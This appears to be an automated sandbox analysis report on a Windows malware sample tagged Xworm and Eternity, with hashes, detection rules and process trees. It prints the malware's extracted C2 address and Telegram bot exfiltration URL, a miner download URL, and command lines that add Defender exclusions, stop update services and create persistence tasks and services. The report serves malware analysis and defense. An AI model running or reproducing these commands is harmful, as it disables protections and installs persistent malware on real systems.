eternity | a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d

Analysis

max time kernel
148s
max time network
138s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
29-03-2024 00:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
Size

455KB
MD5

c8d9593196962fa5d706a207c16674cd
SHA1

686a8e674e6615d5cd91f7b2cba0c755054b3f69
SHA256

a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d
SHA512

5ddae80780c6091bfe0ab5e29bc63732c08ce34f677fc341366dcecf6db9e1bd2e0ed24cfe57eface0d19c6f46010f47eb2d74888b91a503dae00651c4a756bf
SSDEEP

12288:XcTpGLwWpFGIWFfDtaY4S0LEy7w0iymL/:XOpEwiFYxsEyHiyK

Score

10^/10

eternity xworm evasion persistence rat trojan

Malware Config

Extracted

Family

xworm

Version

5.1

104.194.9.116:7000

Mutex

bUezpCDHVjUVS3W9

Attributes

install_file
USB.exe
telegram
https://api.telegram.org/bot6330888131:AAE5ycZdHuNqV5SVYhHeCfRENn6GuCjwXjs/sendMessage?chat_id=1046049845

aes.plain

Extracted

Family

eternity

Wallets

47vk9PbPuHnEnazCn4tLpwPCWRLSMhpX9PD8WqpjchhTXisimD6j8EvRFDbPQHKUmHVq3vAM3DLytXLg8CqcdRXRFdPe92Q

Attributes

payload_urls
https://raw.githubusercontent.com/VolVeRFM/SilentMiner-VolVeR/main/VolVeRBuilder/Resources/xmrig.exe

Signatures

Detect Xworm Payload 5 IoCs

resource	yara_rule
behavioral1/memory/2708-8-0x0000000000400000-0x000000000040E000-memory.dmp	family_xworm
behavioral1/memory/2708-10-0x0000000000400000-0x000000000040E000-memory.dmp	family_xworm
behavioral1/memory/2708-13-0x0000000000400000-0x000000000040E000-memory.dmp	family_xworm
behavioral1/memory/2708-15-0x0000000000400000-0x000000000040E000-memory.dmp	family_xworm
behavioral1/memory/2708-17-0x0000000000400000-0x000000000040E000-memory.dmp	family_xworm

Eternity
Eternity Project is a malware kit offering an info stealer, clipper, worm, coin miner, ransomware, and DDoS bot.
eternity
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Detects Windows executables referencing non-Windows User-Agents 5 IoCs

resource	yara_rule
behavioral1/memory/2708-8-0x0000000000400000-0x000000000040E000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA
behavioral1/memory/2708-10-0x0000000000400000-0x000000000040E000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA
behavioral1/memory/2708-13-0x0000000000400000-0x000000000040E000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA
behavioral1/memory/2708-15-0x0000000000400000-0x000000000040E000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA
behavioral1/memory/2708-17-0x0000000000400000-0x000000000040E000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA

Detects executables packed with or use KoiVM 1 IoCs

resource	yara_rule
behavioral1/memory/2996-3-0x0000000000E00000-0x0000000000E64000-memory.dmp	INDICATOR_EXE_Packed_KoiVM

Detects executables using Telegram Chat Bot 5 IoCs

resource	yara_rule
behavioral1/memory/2708-8-0x0000000000400000-0x000000000040E000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_TelegramChatBot
behavioral1/memory/2708-10-0x0000000000400000-0x000000000040E000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_TelegramChatBot
behavioral1/memory/2708-13-0x0000000000400000-0x000000000040E000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_TelegramChatBot
behavioral1/memory/2708-15-0x0000000000400000-0x000000000040E000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_TelegramChatBot
behavioral1/memory/2708-17-0x0000000000400000-0x000000000040E000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_TelegramChatBot

Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Executes dropped EXE 7 IoCs

pid	Process
476	eaopqu.exe
2016	njkeae.exe
1576	regsvcs.exe
2932	regsvcs.exe
2756	gnfhqv.exe
2364	nflbps.exe
2728	regsvcs.exe

Loads dropped DLL 20 IoCs

pid	Process
2708	installutil.exe
2708	installutil.exe
1316	WerFault.exe
1316	WerFault.exe
1316	WerFault.exe
1316	WerFault.exe
1316	WerFault.exe
1356	cmd.exe
2708	installutil.exe
1060	WerFault.exe
1060	WerFault.exe
1060	WerFault.exe
1060	WerFault.exe
1060	WerFault.exe
2708	installutil.exe
448	WerFault.exe
448	WerFault.exe
448	WerFault.exe
448	WerFault.exe
448	WerFault.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	iexplore.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 2996 set thread context of 2708	2996	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe	28
PID 476 set thread context of 2432	476	eaopqu.exe	35
PID 2756 set thread context of 2516	2756	gnfhqv.exe	48
PID 2364 set thread context of 1972	2364	nflbps.exe	53
PID 1972 set thread context of 1824	1972	iexplore.exe	78

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\wusa.lock	wusa.exe

Launches sc.exe 7 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2128	sc.exe
2648	sc.exe
1348	sc.exe
1312	sc.exe
1576	sc.exe
2164	sc.exe
1724	sc.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2296	schtasks.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2272	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2996	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
2996	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
2996	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
2996	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
2996	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
2996	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
2996	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
2996	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
2996	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
2996	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
2996	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
2996	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
2996	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
2996	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
2996	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
2996	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
2996	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
2996	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
2996	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
2996	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
2996	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
2996	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
2996	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
2996	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
2996	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
2996	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
2996	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
2996	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
2996	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
2996	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
2996	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
2756	gnfhqv.exe
2756	gnfhqv.exe
2756	gnfhqv.exe
2756	gnfhqv.exe
2756	gnfhqv.exe
2756	gnfhqv.exe
2756	gnfhqv.exe
2756	gnfhqv.exe
2756	gnfhqv.exe
2756	gnfhqv.exe
2756	gnfhqv.exe
2756	gnfhqv.exe
2756	gnfhqv.exe
2756	gnfhqv.exe
2756	gnfhqv.exe
2756	gnfhqv.exe
2756	gnfhqv.exe
2756	gnfhqv.exe
2756	gnfhqv.exe
2756	gnfhqv.exe
2756	gnfhqv.exe
2756	gnfhqv.exe
2756	gnfhqv.exe
2756	gnfhqv.exe
2756	gnfhqv.exe
2756	gnfhqv.exe
2756	gnfhqv.exe
2756	gnfhqv.exe
2756	gnfhqv.exe
2756	gnfhqv.exe
2756	gnfhqv.exe
1972	iexplore.exe
2192	powershell.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

description	pid	Process
Token: SeDebugPrivilege	2996	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
Token: SeDebugPrivilege	2708	installutil.exe
Token: SeDebugPrivilege	2756	gnfhqv.exe
Token: SeDebugPrivilege	2192	powershell.exe
Token: SeShutdownPrivilege	1592	powercfg.exe
Token: SeShutdownPrivilege	1264	powercfg.exe
Token: SeShutdownPrivilege	592	powercfg.exe
Token: SeShutdownPrivilege	1596	powercfg.exe
Token: SeDebugPrivilege	1824	dialer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2996 wrote to memory of 2708	2996	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe	28
PID 2996 wrote to memory of 2708	2996	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe	28
PID 2996 wrote to memory of 2708	2996	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe	28
PID 2996 wrote to memory of 2708	2996	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe	28
PID 2996 wrote to memory of 2708	2996	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe	28
PID 2996 wrote to memory of 2708	2996	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe	28
PID 2996 wrote to memory of 2708	2996	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe	28
PID 2996 wrote to memory of 2708	2996	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe	28
PID 2996 wrote to memory of 2708	2996	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe	28
PID 2996 wrote to memory of 2708	2996	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe	28
PID 2996 wrote to memory of 2708	2996	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe	28
PID 2996 wrote to memory of 2708	2996	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe	28
PID 2996 wrote to memory of 3028	2996	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe	29
PID 2996 wrote to memory of 3028	2996	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe	29
PID 2996 wrote to memory of 3028	2996	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe	29
PID 2708 wrote to memory of 476	2708	installutil.exe	31
PID 2708 wrote to memory of 476	2708	installutil.exe	31
PID 2708 wrote to memory of 476	2708	installutil.exe	31
PID 2708 wrote to memory of 476	2708	installutil.exe	31
PID 2708 wrote to memory of 2016	2708	installutil.exe	34
PID 2708 wrote to memory of 2016	2708	installutil.exe	34
PID 2708 wrote to memory of 2016	2708	installutil.exe	34
PID 2708 wrote to memory of 2016	2708	installutil.exe	34
PID 476 wrote to memory of 2432	476	eaopqu.exe	35
PID 476 wrote to memory of 2432	476	eaopqu.exe	35
PID 476 wrote to memory of 2432	476	eaopqu.exe	35
PID 476 wrote to memory of 2432	476	eaopqu.exe	35
PID 476 wrote to memory of 2432	476	eaopqu.exe	35
PID 476 wrote to memory of 2432	476	eaopqu.exe	35
PID 476 wrote to memory of 2432	476	eaopqu.exe	35
PID 476 wrote to memory of 2432	476	eaopqu.exe	35
PID 476 wrote to memory of 2432	476	eaopqu.exe	35
PID 476 wrote to memory of 2432	476	eaopqu.exe	35
PID 476 wrote to memory of 2432	476	eaopqu.exe	35
PID 476 wrote to memory of 2432	476	eaopqu.exe	35
PID 476 wrote to memory of 1316	476	eaopqu.exe	36
PID 476 wrote to memory of 1316	476	eaopqu.exe	36
PID 476 wrote to memory of 1316	476	eaopqu.exe	36
PID 2432 wrote to memory of 1356	2432	regsvcs.exe	37
PID 2432 wrote to memory of 1356	2432	regsvcs.exe	37
PID 2432 wrote to memory of 1356	2432	regsvcs.exe	37
PID 2432 wrote to memory of 1356	2432	regsvcs.exe	37
PID 1356 wrote to memory of 964	1356	cmd.exe	39
PID 1356 wrote to memory of 964	1356	cmd.exe	39
PID 1356 wrote to memory of 964	1356	cmd.exe	39
PID 1356 wrote to memory of 964	1356	cmd.exe	39
PID 1356 wrote to memory of 2272	1356	cmd.exe	40
PID 1356 wrote to memory of 2272	1356	cmd.exe	40
PID 1356 wrote to memory of 2272	1356	cmd.exe	40
PID 1356 wrote to memory of 2272	1356	cmd.exe	40
PID 1356 wrote to memory of 2296	1356	cmd.exe	41
PID 1356 wrote to memory of 2296	1356	cmd.exe	41
PID 1356 wrote to memory of 2296	1356	cmd.exe	41
PID 1356 wrote to memory of 2296	1356	cmd.exe	41
PID 1356 wrote to memory of 1576	1356	cmd.exe	42
PID 1356 wrote to memory of 1576	1356	cmd.exe	42
PID 1356 wrote to memory of 1576	1356	cmd.exe	42
PID 1356 wrote to memory of 1576	1356	cmd.exe	42
PID 1356 wrote to memory of 1576	1356	cmd.exe	42
PID 1356 wrote to memory of 1576	1356	cmd.exe	42
PID 1356 wrote to memory of 1576	1356	cmd.exe	42
PID 340 wrote to memory of 2932	340	taskeng.exe	45
PID 340 wrote to memory of 2932	340	taskeng.exe	45
PID 340 wrote to memory of 2932	340	taskeng.exe	45

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:432

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
PID:480

C:\Users\Admin\AppData\Local\Temp\a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
"C:\Users\Admin\AppData\Local\Temp\a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2996
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2708
- - C:\Users\Admin\AppData\Local\Temp\eaopqu.exe
    "C:\Users\Admin\AppData\Local\Temp\eaopqu.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:476
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2432
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "regsvcs" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\regsvcs.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe" &&START "" "C:\Users\Admin\AppData\Local\ServiceHub\regsvcs.exe"
        5⤵
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:1356
      - C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        6⤵
        
        PID:964
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        6⤵
        Runs ping.exe
        
        PID:2272
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "regsvcs" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\regsvcs.exe" /rl HIGHEST /f
        6⤵
        Creates scheduled task(s)
        
        PID:2296
      - C:\Users\Admin\AppData\Local\ServiceHub\regsvcs.exe
        
        "C:\Users\Admin\AppData\Local\ServiceHub\regsvcs.exe"
        6⤵
        Executes dropped EXE
        
        PID:1576
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 476 -s 2104
      4⤵
      Loads dropped DLL
      PID:1316
- - C:\Users\Admin\AppData\Local\Temp\njkeae.exe
    "C:\Users\Admin\AppData\Local\Temp\njkeae.exe"
    3⤵
    - Executes dropped EXE
    PID:2016
- - C:\Users\Admin\AppData\Local\Temp\gnfhqv.exe
    "C:\Users\Admin\AppData\Local\Temp\gnfhqv.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2756
  - - C:\Program Files\Windows Mail\wab.exe
      "C:\Program Files\Windows Mail\wab.exe"
      4⤵
      PID:2516
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 2756 -s 728
      4⤵
      Loads dropped DLL
      PID:1060
- - C:\Users\Admin\AppData\Local\Temp\nflbps.exe
    "C:\Users\Admin\AppData\Local\Temp\nflbps.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:2364
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe"
      4⤵
      Drops file in System32 directory
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      PID:1972
    - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        5⤵
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2192
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:2800
      - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        6⤵
        Drops file in Windows directory
        
        PID:684
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        5⤵
        Launches sc.exe
        
        PID:1348
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        
        PID:1312
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        5⤵
        Launches sc.exe
        
        PID:1576
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        5⤵
        Launches sc.exe
        
        PID:2164
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        5⤵
        Launches sc.exe
        
        PID:1724
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1264
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1592
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:592
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1596
    - - C:\Windows\system32\dialer.exe
        
        C:\Windows\system32\dialer.exe
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1824
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "AHIMMUFK"
        5⤵
        Launches sc.exe
        
        PID:2128
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "AHIMMUFK" binpath= "C:\ProgramData\xlffyhztkvzk\pkiwizgebqxq.exe" start= "auto"
        5⤵
        Launches sc.exe
        
        PID:2648
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 2364 -s 2112
      4⤵
      Loads dropped DLL
      PID:448
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 2996 -s 732
  2⤵
  PID:3028

C:\Windows\system32\taskeng.exe
taskeng.exe {F97C765A-494E-405C-98DD-78E245D71387} S-1-5-21-3627615824-4061627003-3019543961-1000:SCFGBRBT\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:340
- C:\Users\Admin\AppData\Local\ServiceHub\regsvcs.exe
  C:\Users\Admin\AppData\Local\ServiceHub\regsvcs.exe
  2⤵
  - Executes dropped EXE
  PID:2932
- C:\Users\Admin\AppData\Local\ServiceHub\regsvcs.exe
  C:\Users\Admin\AppData\Local\ServiceHub\regsvcs.exe
  2⤵
  - Executes dropped EXE
  PID:2728

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Remote System Discovery

T1018

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\ServiceHub\regsvcs.exe

Filesize
44KB

MD5
0e06054beb13192588e745ee63a84173

SHA1
30b7d4d1277bafd04a83779fd566a1f834a8d113

SHA256
c5d6d56ded55fbd6c150ee3a0eb2e5671cae83106be2be4d70ce50aa50bab768

SHA512
251a112f3f037e62ff67a467389e47a56afb344bc942b17efa9bd2970494718b26bbee9adc3ac35f93ee4d2114aa426b6d0ea4bafad294b6c118a15f1977c215

Download Submit
C:\Users\Admin\AppData\Local\Temp\gnfhqv.exe

Filesize
16.5MB

MD5
d01b812c108576056594805b6e9e7064

SHA1
290fc3e50cf13a1595f1ba3357285153ac98834d

SHA256
9a6ac9acc3267fc22ecd8872e3e9d863dce608d609ee06fb0769b599ce669ec4

SHA512
d3709b4a6760e149bcd774f7648857a47161e7144530e3d1ae700b33861837d494d646bb8accd3980b3ccb955682c9c1ebe2c3f22371fb9566f669c48fb09be4

Download Submit
C:\Users\Admin\AppData\Local\Temp\njkeae.exe

Filesize
756KB

MD5
d76027fe4cfd48c7f8999c796e50e731

SHA1
5026422e84bf445e2d141529e2b808187a30d9f6

SHA256
148da274864c690a7c01119e025bdc0ab94fa9c110c30afb42e51b1c990a2799

SHA512
2e2c4a5319a61555913648702ddcfb8b40d548dcfda1a536a2e85f9cb85d25d9a463743dc866f86b4de99fd10f9c402def424b9e8a203189518f45e924b89d2d

Download Submit
\Users\Admin\AppData\Local\Temp\eaopqu.exe

Filesize
393KB

MD5
3f3a51617811e9581aba50376599efa6

SHA1
9b26aa73f43a4db9b216b90d1aa3e2e4d602fde8

SHA256
5f3403e13e316d9320d46233e9f62b183623c46ec80c6c55139efdd72c5ada37

SHA512
9ad5cfb29281dd462b726c7ee239926f83050181fe4f6c3e9057e51df65ae7f850cecbf1cb453287720314275335df36bb8d5299d09a1f73329a5b9292db3ee3

Download Submit
\Users\Admin\AppData\Local\Temp\nflbps.exe

Filesize
3.1MB

MD5
86e00d529b3b454a84b942ac916211e3

SHA1
021c733e5448436b384bf0d3a0ba81f4d0d93f9a

SHA256
30e01b261cb5d7524a303cdbe9d177fc05d74279642e4a87b46ee70045e68d53

SHA512
9a08379b35a3bf1699b925c6dbfc6e85123f1155e567929eaff3683e5e9f196a16775e3a2f6a7585f7c0f0f201ef4be009cda5cf94b160742642145837c3de1e

Download Submit
memory/432-1219-0x0000000036D70000-0x0000000036D80000-memory.dmp

Filesize
64KB

Download
memory/432-1218-0x000007FEBE600000-0x000007FEBE610000-memory.dmp

Filesize
64KB

Download
memory/432-1217-0x0000000000EA0000-0x0000000000ECB000-memory.dmp

Filesize
172KB

Download
memory/432-1216-0x0000000000CA0000-0x0000000000CC4000-memory.dmp

Filesize
144KB

Download
memory/432-1215-0x0000000000CA0000-0x0000000000CC4000-memory.dmp

Filesize
144KB

Download
memory/476-65-0x000000001BED0000-0x000000001C295000-memory.dmp

Filesize
3.8MB

Download
memory/476-31-0x00000000008A0000-0x00000000008AA000-memory.dmp

Filesize
40KB

Download
memory/476-83-0x000000001ACD0000-0x000000001ACE2000-memory.dmp

Filesize
72KB

Download
memory/476-80-0x000000001AD00000-0x000000001AD22000-memory.dmp

Filesize
136KB

Download
memory/476-81-0x000000001ACD0000-0x000000001ACEA000-memory.dmp

Filesize
104KB

Download
memory/476-82-0x000000001B210000-0x000000001B22A000-memory.dmp

Filesize
104KB

Download
memory/476-79-0x000000001ACD0000-0x000000001ACF2000-memory.dmp

Filesize
136KB

Download
memory/476-74-0x000000001ABE0000-0x000000001ABE8000-memory.dmp

Filesize
32KB

Download
memory/476-69-0x000000001B210000-0x000000001B28C000-memory.dmp

Filesize
496KB

Download
memory/476-29-0x0000000000DF0000-0x0000000000DFE000-memory.dmp

Filesize
56KB

Download
memory/476-32-0x00000000008C0000-0x00000000008CA000-memory.dmp

Filesize
40KB

Download
memory/476-70-0x000000001B5D0000-0x000000001B64C000-memory.dmp

Filesize
496KB

Download
memory/476-33-0x000000001AB50000-0x000000001ABCE000-memory.dmp

Filesize
504KB

Download
memory/476-34-0x000000001AC90000-0x000000001AD0E000-memory.dmp

Filesize
504KB

Download
memory/476-35-0x0000000000C30000-0x0000000000C4C000-memory.dmp

Filesize
112KB

Download
memory/476-36-0x0000000000D50000-0x0000000000D6C000-memory.dmp

Filesize
112KB

Download
memory/476-38-0x000000001A660000-0x000000001A674000-memory.dmp

Filesize
80KB

Download
memory/476-37-0x0000000000C30000-0x0000000000C44000-memory.dmp

Filesize
80KB

Download
memory/476-39-0x0000000000A20000-0x0000000000A30000-memory.dmp

Filesize
64KB

Download
memory/476-40-0x0000000000C30000-0x0000000000C40000-memory.dmp

Filesize
64KB

Download
memory/476-42-0x000000001AB50000-0x000000001AB68000-memory.dmp

Filesize
96KB

Download
memory/476-41-0x0000000000C30000-0x0000000000C48000-memory.dmp

Filesize
96KB

Download
memory/476-43-0x000000001BAE0000-0x000000001BC3A000-memory.dmp

Filesize
1.4MB

Download
memory/476-44-0x000000001BC40000-0x000000001BD9A000-memory.dmp

Filesize
1.4MB

Download
memory/476-45-0x000000001B210000-0x000000001B2B4000-memory.dmp

Filesize
656KB

Download
memory/476-46-0x000000001B2E0000-0x000000001B384000-memory.dmp

Filesize
656KB

Download
memory/476-48-0x000000001AB70000-0x000000001AB8A000-memory.dmp

Filesize
104KB

Download
memory/476-47-0x0000000000C30000-0x0000000000C4A000-memory.dmp

Filesize
104KB

Download
memory/476-49-0x000000001BAE0000-0x000000001BC02000-memory.dmp

Filesize
1.1MB

Download
memory/476-51-0x000000001AB70000-0x000000001ABB4000-memory.dmp

Filesize
272KB

Download
memory/476-50-0x000000001BDA0000-0x000000001BEC2000-memory.dmp

Filesize
1.1MB

Download
memory/476-52-0x000000001ABC0000-0x000000001AC04000-memory.dmp

Filesize
272KB

Download
memory/476-54-0x000000001B210000-0x000000001B286000-memory.dmp

Filesize
472KB

Download
memory/476-53-0x000000001AC90000-0x000000001AD06000-memory.dmp

Filesize
472KB

Download
memory/476-56-0x000000001ABC0000-0x000000001ABD0000-memory.dmp

Filesize
